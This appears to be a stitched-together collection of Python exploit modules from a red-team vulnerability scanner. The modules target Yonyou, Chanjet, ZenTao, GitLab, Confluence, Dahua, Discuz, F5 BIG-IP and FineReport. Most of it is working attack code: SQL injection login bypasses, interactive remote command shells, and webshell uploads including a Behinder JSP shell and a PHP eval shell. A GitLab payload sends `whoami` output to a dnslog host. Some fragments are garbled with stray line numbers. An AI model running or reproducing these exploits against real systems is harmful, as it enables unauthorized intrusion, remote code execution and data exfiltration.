timeout=timeout, json=payload_json, verify=False) 71 | if rep.status_code == 200 and re.search('SSLVPN_Resource', rep.text): 72 | print('[+] 上传完成,正在检测是否上传成功?') 73 | rep2 = 
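# --- /pocs/redteam/yongyou_chanjet_login_sqli.py ---
import re
import urllib.parse

import requests


def verify(url):
    """Probe the Chanjet (畅捷通) ``GNRemote.dll`` login handler for SQL injection.

    The POSTed ``username`` is ``"' or 1=1;"`` (pre-URL-encoded). A reply of
    ``{"RetCode":0}`` together with a ``Set-Cookie`` header means the login
    check was bypassed; the issued ``GNSESSIONID`` is reported so an operator
    can reuse the session.

    Args:
        url: Base URL of the target.

    Returns:
        Result dict. On success ``vulnerable`` is True, ``vurl`` is the login
        endpoint and ``GNSESSIONID`` carries the session id when one could be
        parsed from ``Set-Cookie``. Exceptions are swallowed and yield the
        not-vulnerable dict.
    """
    result = {
        'name': '畅捷通sql注入登录后台rce',
        'vulnerable': False,
        'url': url,
        'attack': False,
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'DNT': '1',
    }
    vurl = urllib.parse.urljoin(url, '/GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl')
    # username="' or 1=1;" ; the password value is opaque (copied from the public PoC).
    payload_data = '''username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1'''
    try:
        rep = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=payload_data)
        bypassed = (
            rep.status_code == 200
            and re.search(r'\{"RetCode":0\}', rep.text) is not None
            and 'Set-Cookie' in rep.headers
        )
        if bypassed:
            result['vulnerable'] = True
            result['vurl'] = vurl
            # The original did findall(...)[0]: when the cookie header carried no
            # GNSESSIONID the IndexError fell into the bare except and flipped a
            # confirmed bypass back to "not vulnerable". Also stop the capture at
            # ';' / ',' so cookie attributes (Path=, HttpOnly ...) or a second
            # cookie are not glued onto the id.
            m = re.search(r"GNSESSIONID=([^;,\s]+)", rep.headers['Set-Cookie'])
            if m:
                result['GNSESSIONID'] = m.group(1)
    except Exception:
        pass
    return result
# --- /pocs/redteam/yongyou_nc_file-receive-servlet_fileupload_2021.py (listing continues below) ---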
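import base64
import re
import urllib.parse

import requests


def verify(url):
    """Yonyou NC (>6.5) unauthenticated file write via ``/servlet/FileReceiveServlet``.

    ``data`` is a base64-encoded Java-serialized ``java.util.HashMap`` with
    ``FILE_NAME=bd3bd.jsp`` and ``TARGET_FILE_PATH=./webapps/nc_web`` followed
    by the JSP body ``<%out.print("9uY193ZWJ4PCVvdXQucHJpbnQoImFiY2RlZ");%>``.
    POSTing it makes the servlet write that JSP into the web root; the probe
    then fetches ``/bd3bd.jsp`` and looks for the marker string.

    WARNING: this "verify" is not passive — it drops a JSP into the target's
    web root and leaves it there (fixed name ``bd3bd.jsp``, never cleaned up).
    The file writes only a constant marker, but it is still an artifact the
    target owner will find; get authorization and record it for the report.

    Args:
        url: Base URL of the target.

    Returns:
        Result dict; ``vulnerable``/``verify`` are set when the marker is served
        back. Errors are swallowed and reported as not vulnerable.

    NOTE(review): ``attack`` is True but this file defines no ``attack()``;
    presumably the framework tolerates that — confirm in the plugin loader.
    """
    result = {
        'name': '用友 NC >6.5 未授权文件上传漏洞(/servlet/FileReceiveServlet)',
        'vulnerable': False,
        'url': url,
        'attack': True,
        'about': 'https://blog.csdn.net/weixin_44578334/article/details/110917053',
    }
    timeout = 20
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        # Content-Type does not describe the body (raw serialized Java); kept as
        # in the public PoC since the servlet presumably ignores it.
        "Content-Type": "multipart/form-data;",
        "Referer": "https://google.com"
    }
    vurl = urllib.parse.urljoin(url, '/servlet/FileReceiveServlet')
    verify_url = urllib.parse.urljoin(url, '/bd3bd.jsp')
    # shell: <%out.print("9uY193ZWJ4PCVvdXQucHJpbnQoImFiY2RlZ");%>
    # filename: bd3bd.jsp
    marker = "9uY193ZWJ4PCVvdXQucHJpbnQoImFiY2RlZ"
    data = "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAACdAAJRklMRV9OQU1FdAAJYmQzYmQuanNwdAAQVEFSR0VUX0ZJTEVfUEFUSHQAEC4vd2ViYXBwcy9uY193ZWJ4PCVvdXQucHJpbnQoIjl1WTE5M1pXSjRQQ1Z2ZFhRdWNISnBiblFvSW1GaVkyUmxaIik7JT4="
    try:
        # Cheap reachability gate before the (destructive) upload.
        rep = requests.get(url, headers=headers, verify=False, timeout=timeout)
        if rep.status_code != 200:
            return result
        rep2 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=base64.b64decode(data))
        if rep2.status_code != 200:
            return result
        verify_rep = requests.get(verify_url, headers=headers, verify=False, timeout=timeout)
        if verify_rep.status_code == 200 and re.search(marker, verify_rep.text):
            result['vulnerable'] = True
            result['verify'] = verify_url
    except Exception:
        pass
    return result


# --- /pocs/redteam/yongyou_nc_rce_2022.py ---
import re
import urllib.parse

import requests


def verify(url):
    """Detect an exposed BeanShell test servlet on Yonyou NC.

    Only fingerprints: a 200 on ``/servlet//~ic/bsh.servlet.BshServlet`` whose
    body contains ``BeanShell Test Servle`` (prefix match, as in the original)
    is reported. Nothing is executed here; see ``attack``.

    Returns:
        Result dict with ``vulnerable``/``vurl`` set on a match.
    """
    result = {
        'name': '用友NC bsh.servlet.BshServlet 命令执行(2022HVV)',
        'vulnerable': False,
        'url': url,
        'attack': True,
        'about': 'https://blog.csdn.net/weixin_44146996/article/details/117450104',
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/servlet//~ic/bsh.servlet.BshServlet')
    try:
        rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout)
        if rep.status_code == 200 and re.search('BeanShell Test Servle', rep.text):
            result['vulnerable'] = True
            result['vurl'] = vurl
    except Exception:
        pass
    return result


def attack(url):
    """Interactive command loop through the exposed BeanShell servlet.

    Each prompt line is wrapped as ``bsh.script=print("$");exec("<cmd>");print("$");``
    and POSTed; the text between the two ``$`` markers is printed as output.
    Type ``exit`` (or Ctrl-C / Ctrl-D) to leave the loop.

    Returns:
        True when the loop ended normally, False on an unexpected error.
    """
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/servlet//~ic/bsh.servlet.BshServlet')
    # NOTE(review): cmd is spliced verbatim into a form-encoded body; '&', '+',
    # '%' or '"' in a command will be mis-parsed. Not changed here.
    print('[+] 尝试执行命令 ......')
    try:
        print('[+] 开始执行命令,输入exit退出!')
        while True:
            try:
                cmd = input('执行命令 > ')
            except (KeyboardInterrupt, EOFError):
                # The original bare except swallowed Ctrl-C as a "timeout" and
                # kept looping; the only way out was typing exit.
                break
            if cmd == 'exit':
                break
            data = 'bsh.script=print("$");exec("{0}");print("$");'.format(cmd)
            try:
                rep = requests.post(vurl, timeout=timeout, verify=False, headers=headers, data=data)
            except requests.RequestException:
                print('[-] 执行命令超时,(timeout > {0})'.format(timeout))
                continue
            # A command with no output yields "$$": findall(...)[0] raised
            # IndexError and was reported as a timeout by the original.
            chunks = re.findall(r'\$([^$]+)\$', rep.text)
            print('[*] Output:', chunks[0] if chunks else '')
        return True
    except Exception:
        return False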
False, 9 | 'attack': True, 10 | 'about': "https://github.com/luck-ying/Library-POC/blob/be26ae4e4c5bdec61dfc485d183826d09fe7e490/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-KSOA-%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/yonyou-KSOA-Arbitrary-File-upload.py", 11 | } 12 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 13 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | shell = f'<% out.println("{randstr1}" + "{randstr2}"); %>' 15 | payload = '/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=test.jsp' 16 | timeout = 5 17 | headers = { 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' 19 | } 20 | vurl = urllib.parse.urljoin(url, payload) 21 | try: 22 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=shell, verify=False) 23 | if rep.status_code == 200: 24 | return_path = re.search('(?<=).*(?=)', rep.text).group(0) 25 | verify_url = urllib.parse.urljoin(url, return_path) 26 | time.sleep(1) 27 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 28 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 29 | result['vulnerable'] = True 30 | result['verify'] = verify_url 31 | return result 32 | except: 33 | return result 34 | 35 | def attack(url): 36 | shell = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new 
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 37 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 8)) + '.jsp' 38 | payload = f'/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=(unknown)' 39 | timeout = 5 40 | headers = { 41 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' 42 | } 43 | vurl = urllib.parse.urljoin(url, payload) 44 | print("[+] exploit loading ......") 45 | try: 46 | time.sleep(2) 47 | print("[+] 开始上传webshell") 48 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=shell, verify=False) 49 | if rep.status_code == 200: 50 | print("[+] 上传成功,正在检查是否存在?") 51 | return_path = re.search('(?<=).*(?=)', rep.text).group(0) 52 | print("[*] 成功获得上传路径,path: ", return_path) 53 | verify_url = urllib.parse.urljoin(url, return_path) 54 | time.sleep(1) 55 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 56 | if rep2.status_code == 200: 57 | print("[*] 上传成功! 
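# --- /pocs/redteam/zentao_cnvd-2022-42853_sqli.py ---
import hashlib
import random
import re
import urllib.parse

import requests


def verify(url):
    """Error-based SQL injection check for ZenTao 16.5 (CNVD-2022-42853).

    A random 10-digit number is embedded as ``MD5(<num>)`` inside an
    ``extractvalue()`` XPath error; MySQL echoes the hash in the error text.
    The response must contain ``XPATH syntax error`` and the middle of the
    locally computed hash (``[3:-3]``, tolerating the truncation extractvalue
    applies to the error string).

    Args:
        url: Base URL of the target; the probe hits ``/zentao/user-login.html``.

    Returns:
        Result dict; on a hit ``vurl``, ``method`` and ``data`` describe the
        request. Exceptions are swallowed and reported as not vulnerable.
    """
    result = {
        'name': 'CNVD-2022-42853: 禅道16.5 SQL注入',
        'vulnerable': False,
        'attack': False,
        'about': "https://www.cnblogs.com/hxlinux/p/16552842.html"
    }
    # Per-run marker: the same value is hashed by MySQL and locally, so a
    # cached or canned error page cannot produce a false positive.
    str_num = str(random.randint(1000000000, 9999999999))
    str_md5 = hashlib.md5(str_num.encode()).hexdigest()
    timeout = 3
    vurl = urllib.parse.urljoin(url, '/zentao/user-login.html')
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate",
        "Referer": vurl
    }
    sqli_payload = f"'+and+(select+extractvalue(1,concat(0x7e,(MD5({str_num})),0x7e)))#"
    payload_data = f"account=admin{sqli_payload}"
    try:
        rep = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=payload_data)
        hit = re.search("XPATH syntax error", rep.text) and re.search(str_md5[3:-3], rep.text)
        if hit:
            result['vulnerable'] = True
            result['vurl'] = vurl
            result['method'] = "POST"
            result["data"] = payload_data
    except Exception:
        pass
    return result


# --- /pocs/web/CVE_2021_22205.py ---
import urllib.parse

import requests
from bs4 import BeautifulSoup


def verify(url):
    """CVE-2021-22205 (GitLab ExifTool DjVu RCE) probe.

    Fetches ``/users/sign_in`` for a CSRF token, then uploads a crafted DjVu
    file (as ``test.jpg``) to ``/uploads/user``. The verdict is the string
    ``Failed to process image`` in the upload response, which the public
    write-ups associate with the vulnerable ExifTool path being reached.

    SECURITY/OPSEC: the DjVu blob's ``(metadata (Copyright ...))`` embeds
    ``qx{curl `whoami`.82sm53.dnslog.cn}``. On a vulnerable host that runs
    curl with the local user name as a subdomain of a *hard-coded* dnslog
    token that nobody on your engagement controls — the target's data is sent
    to a third party, and this script never inspects the DNS side anyway.
    Replace the domain with an operator-owned callback before field use, or
    drop the command entirely since the verdict does not depend on it.

    Returns:
        Result dict; ``url``/``about`` are added on a positive match.
    """
    result = {
        'name': 'CVE-2021-22205 GitLab 未授权RCE',
        'vulnerable': False
    }
    session = requests.Session()
    try:
        vulurl = urllib.parse.urljoin(url, "/users/sign_in")
        vulurl2 = urllib.parse.urljoin(url, "/uploads/user")
        req1 = session.get(vulurl, verify=False, timeout=10)
        soup = BeautifulSoup(req1.text, features="lxml")
        # The sign-in page presumably carries the token as
        # <meta name="csrf-token" content="..."> (Rails convention). The
        # original used findAll('meta')[16], which silently picks whatever tag
        # happens to be 17th; that positional lookup is kept only as a fallback.
        meta = soup.find('meta', attrs={'name': 'csrf-token'})
        if meta is not None:
            token = meta.get("content")
        else:
            token = soup.findAll('meta')[16].get("content")
        # Multipart body with a hand-built DjVu payload. It is a str holding
        # raw byte escapes; this relies on the HTTP stack mapping code points
        # <= 0xFF to single bytes — TODO confirm, or send bytes explicitly.
        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}",
            "Accept-Encoding": "gzip, deflate",
        }
        flag = 'Failed to process image'
        req2 = session.post(vulurl2, data=data, headers=headers, verify=False, timeout=10)
        if flag in req2.text:
            result['vulnerable'] = True
            result['url'] = url
            result['about'] = ('https://blog.csdn.net/qq_51524329/article/details/121051714'
                               ',https://github.com/r0eXpeR/CVE-2021-22205')
    except Exception:
        pass
    return result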
'/v1/' + filename + '?cmd=') 28 | payload = urllib.parse.urljoin(base_url, '/v1/backend1') 29 | r = requests.post(payload, headers=headers, data=body, verify=False, timeout=timeout) 30 | check_file = requests.get(urllib.parse.urljoin(base_url, '/v1/' + filename), verify=False, timeout=timeout) 31 | check_file2 = requests.get(urllib.parse.urljoin(base_url, '/v1/axekfcerdps'), verify=False, timeout=timeout) 32 | verify_rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 33 | if check_file.status_code == 200 and check_file2.status_code != 200 and "have fun : )" in verify_rep.text: 34 | relsult['vulnerable'] = True 35 | relsult['url'] = base_url 36 | relsult['cmdshell'] = verify_url 37 | relsult['about'] = 'https://github.com/oxctdev/CVE-2021-40870' 38 | return relsult 39 | else: 40 | return relsult 41 | except: 42 | return relsult 43 | -------------------------------------------------------------------------------- /pocs/web/atlassian/CVE_2022_26134.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import requests 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Atlassian Confluence 远程代码执行(CVE-2022-26134)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'https://mp.weixin.qq.com/s/L9zZdynW5bRaGESapw0oeA, ' 12 | 'https://github.com/jbaines-r7/through_the_wire', 13 | } 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Accept': '*/*', 18 | } 19 | cmd = 'whoami' 20 | vurl1 = urllib.parse.urljoin(url, '/login.action') 21 | vurl2 = urllib.parse.urljoin(url, '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + cmd + 
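# --- /pocs/web/dahua/CVE_2021_33044.py ---
import re
import urllib.parse

import requests


def verify(url):
    """Check a Dahua device for the CVE-2021-33044 login bypass.

    A ``global.login`` RPC is sent with ``clientType: NetKeyboard`` and
    ``password: "Not Used"``; a device answering ``"result":true`` with a
    session id accepted the login without a valid password.

    Returns:
        Result dict; ``vulnerable``/``vurl`` set on a match. Exceptions are
        swallowed and reported as not vulnerable.
    """
    result = {
        'name': ' Dahua IPC/VTH/VTO devices Authentication Bypas(CVE-2021-33044)',
        'vulnerable': False,
        'attack': False,
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    timeout = 3
    vurl = urllib.parse.urljoin(url, '/RPC2_Login')
    payload_data = '{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}'
    # Matches the exact, whitespace-free JSON the device emits; any change in
    # formatting is a false negative.
    success_re = re.compile(r'\{"id":1,"params":\{"keepAliveInterval":60\},"result":true,"session":".+"\}')
    try:
        # NOTE(review): the JSON body rides on a GET, as in the upstream PoC;
        # proxies may strip GET bodies — confirm on a live device before
        # trusting a negative.
        rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data)
        if rep.status_code == 200 and success_re.search(rep.text):
            result['vulnerable'] = True
            result['vurl'] = vurl
    except Exception:
        pass
    return result


# --- /pocs/web/discuz/discuz67x_rce.py ---
import re
import urllib.parse

import requests


def verify(url):
    """Detect the Discuz! 6.x/7.x ``GLOBALS[_DCACHE]`` cookie injection.

    Two GETs on ``/viewthread.php?tid=1``: the first fingerprints the app
    (body contains lowercase ``discuz``), the second carries cookies that
    overwrite the smilies cache (``/.*/eui`` search pattern, ``phpinfo()``
    replacement) so the injected PHP runs; ``PHP Version`` in the body means
    it executed.

    Unlike most PoCs in this tree, TLS verification is left ON here (no
    ``verify=False``), so self-signed targets fail closed.

    Returns:
        Result dict; ``url``/``vurl``/``about`` added on a positive match.
    """
    result = {
        'name': 'Discuz!6.x7.x全局变量防御绕过-命令执行',
        'vulnerable': False,
        'attack': True,
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    cookies = {
        "GLOBALS[_DCACHE][smilies][searcharray]": "/.*/eui",
        "GLOBALS[_DCACHE][smilies][replacearray]": "phpinfo()",
    }
    try:
        tid = 1  # default thread id to request
        vurl = urllib.parse.urljoin(url, '/viewthread.php?tid={0}'.format(tid))
        rep = requests.get(vurl, headers=headers, timeout=3)
        if not re.search('discuz', rep.text):
            return result
        rep2 = requests.get(vurl, headers=headers, cookies=cookies, timeout=3)
        if re.search('PHP Version', rep2.text):
            result['vulnerable'] = True
            result['url'] = url
            result['vurl'] = vurl
            result['about'] = 'https://blog.csdn.net/haha13l4/article/details/95949416'
    except Exception:
        pass
    return result


def attack(url):
    """Write a PHP webshell through the same cookie injection as ``verify``.

    The ``replacearray`` cookie is an ``eval()`` of a ``Chr()`` chain that
    decodes to ``fputs(fopen('wf.php','w'),'<?php @eval($_POST[lalala])?>');``,
    i.e. it drops ``wf.php`` next to ``viewthread.php``. Success is reported
    when both the injection request and a follow-up GET of ``wf.php`` return
    200 (the shell's behaviour itself is not checked).

    Returns:
        True when the shell appears reachable, False otherwise.
    """
    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        }
        cookies = {
            "GLOBALS[_DCACHE][smilies][searcharray]": "/.*/eui",
            "GLOBALS[_DCACHE][smilies][replacearray]": "eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))",
        }
        found = verify(url)
        if not found['vulnerable']:
            return False
        vurl = found['vurl']
        print('[+] 正在写入木马 ......')
        rep2 = requests.get(vurl, headers=headers, cookies=cookies, timeout=5)
        # Relative join on purpose: wf.php is created in the script's own
        # directory, so it sits beside viewthread.php — presumably why no
        # leading slash is used here (unlike the other PoCs).
        webshell = urllib.parse.urljoin(url, 'wf.php')
        verify_rep = requests.get(webshell, timeout=5)
        if rep2.status_code == 200 and verify_rep.status_code == 200:
            print('[+] 文件写入成功!')
            print('[*] webshell地址(蚁剑): ', webshell)
            print('[*] 密码: lalala')
            return True
        return False
    except Exception:
        return False


# --- /pocs/web/f5/CVE_2022_1388.py ---
import re
import urllib.parse

import requests


def verify(url):
    """CVE-2022-1388: F5 BIG-IP iControl REST authentication bypass.

    The request carries ``Connection: X-F5-Auth-Token`` so the front-end drops
    the bogus token header, plus a Basic ``admin:...`` credential (the user
    name is what matters) and ``Host: 127.0.0.1``. It runs ``id`` through
    ``/mgmt/tm/util/bash`` — this is real command execution, not a passive
    probe — and reports vulnerable when the reply is a 200 containing
    ``commandResult`` and ``tm:util:bash:runstate``.

    Returns:
        Result dict; ``vulnerable`` set on a hit (``url``/``about`` are already
        populated).
    """
    result = {
        'name': 'CVE-2022-1388 F5-BIGIP iControl REST绕过授权访问漏洞',
        'vulnerable': False,
        'attack': True,
        'url': url,
        'about': 'https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py, '
                 'https://github.com/0xf4n9x/CVE-2022-1388/blob/main/CVE-2022-1388.py',
    }
    headers = {
        'Host': '127.0.0.1',
        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
        'X-F5-Auth-Token': 'asdf',
        'Connection': 'X-F5-Auth-Token',
        'Content-Type': 'application/json',
    }
    cmd = 'id'
    try:
        vurl = urllib.parse.urljoin(url, '/mgmt/tm/util/bash')
        j = {"command": "run", "utilCmdArgs": "-c '{0}'".format(cmd)}
        rep = requests.post(vurl, headers=headers, json=j, verify=False, timeout=5)
        if rep.status_code == 200 and re.search('commandResult', rep.text) and re.search('tm:util:bash:runstate', rep.text):
            result['vulnerable'] = True
    except Exception:
        pass
    return result


def attack(url):
    """Interactive shell through the CVE-2022-1388 bypass; ``exit`` leaves the loop.

    Each command is passed as ``-c '<cmd>'`` — a single quote inside the
    command breaks the quoting (not handled). The original sent the literal
    word ``exit`` to the target before noticing it; the check now happens
    before any request.

    NOTE(review): unlike ``verify`` no ``Host: 127.0.0.1`` header is sent here;
    presumably the bypass works without it, but the two should agree.

    Returns:
        True when the loop ended normally, False on an unexpected error.
    """
    headers = {
        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
        'X-F5-Auth-Token': 'asdf',
        'Connection': 'X-F5-Auth-Token',
        'Content-Type': 'application/json',
    }
    vurl = urllib.parse.urljoin(url, '/mgmt/tm/util/bash')
    print('[+] 开始执行命令(输入exit退出)!')
    try:
        while True:
            cmd = input('[+] 执行命令 > ')
            if cmd == 'exit':
                break
            try:
                j = {"command": "run", "utilCmdArgs": "-c '{0}'".format(cmd)}
                rep = requests.post(vurl, headers=headers, json=j, verify=False, timeout=3)
                if rep.status_code == 200 and re.search('commandResult', rep.text) and re.search('tm:util:bash:runstate', rep.text):
                    # A command with no output may omit commandResult; fall
                    # back to '' instead of reporting a bogus timeout.
                    output = rep.json().get('commandResult', '')
                    print('[+] 执行结果: ', output)
            except Exception:
                print('[+] 执行超时,请检查是否成功?')
        return True
    except Exception:
        return False


# --- /pocs/web/fanruan/fanruan_oa_v9_fileupload.py ---
import random
import re
import string
import time
import urllib.parse

import requests


def verify(url):
    """FineReport V9 ``design_save_svg`` path traversal file overwrite.

    POSTs a JSON body whose ``__CONTENT__`` is a tiny JSP that prints two
    random 4-char markers; ``filePath`` traverses out of ``chartmapsvg/`` to
    ``/WebReport/update.jsp``. The probe then GETs that JSP and looks for the
    concatenated marker.

    WARNING: this "verify" OVERWRITES ``/WebReport/update.jsp`` on the target —
    an existing application file — and does not restore it. Treat it as a
    destructive action that needs explicit authorization.

    Returns:
        Result dict; ``vulnerable``/``verify`` set when the marker is served.
    """
    result = {
        'name': '帆软报表 V9 design_save_svg 任意文件覆盖文件上传 ',
        'vulnerable': False,
        'attack': True,
        'url': url,
        'about': 'http://wiki.peiqi.tech/wiki/oa/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20V9%20design_save_svg%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html',
    }
    randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4))
    randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4))
    shell = f'<%out.println(\"{randstr1}\"+\"{randstr2}\");%>'
    payload = '/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp'
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible, MSIE 9.0, Windows NT 6.1, Trident/5.0)',
        # text/xml is sent although the body is JSON (json=); kept as in the
        # public PoC — presumably the handler does not look at Content-Type.
        'Content-Type': 'text/xml;charset=UTF-8',
    }
    vurl = urllib.parse.urljoin(url, payload)
    data = {
        "__CONTENT__": shell,
        "__CHARSET__": "UTF-8",
    }
    verify_url = urllib.parse.urljoin(url, '/WebReport/update.jsp')
    try:
        rep1 = requests.post(vurl, headers=headers, timeout=timeout, json=data, verify=False)
        if rep1.status_code != 200 or not re.search('FineReport', rep1.text):
            return result
        rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False)
        if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text):
            result['vulnerable'] = True
            result['verify'] = verify_url
    except Exception:
        pass
    return result


def attack(url):
    """Overwrite ``/WebReport/update.jsp`` with a Behinder (冰蝎) JSP shell.

    Same traversal as ``verify``; ``shell`` is the stock Behinder v3 JSP
    (AES key ``e45e329feb5d925b`` = md5("rebeyond")[:16]). Success is judged
    only by a 200 on the target path — the shell is not exercised.

    Returns:
        True when the upload and the follow-up GET both return 200.
    """
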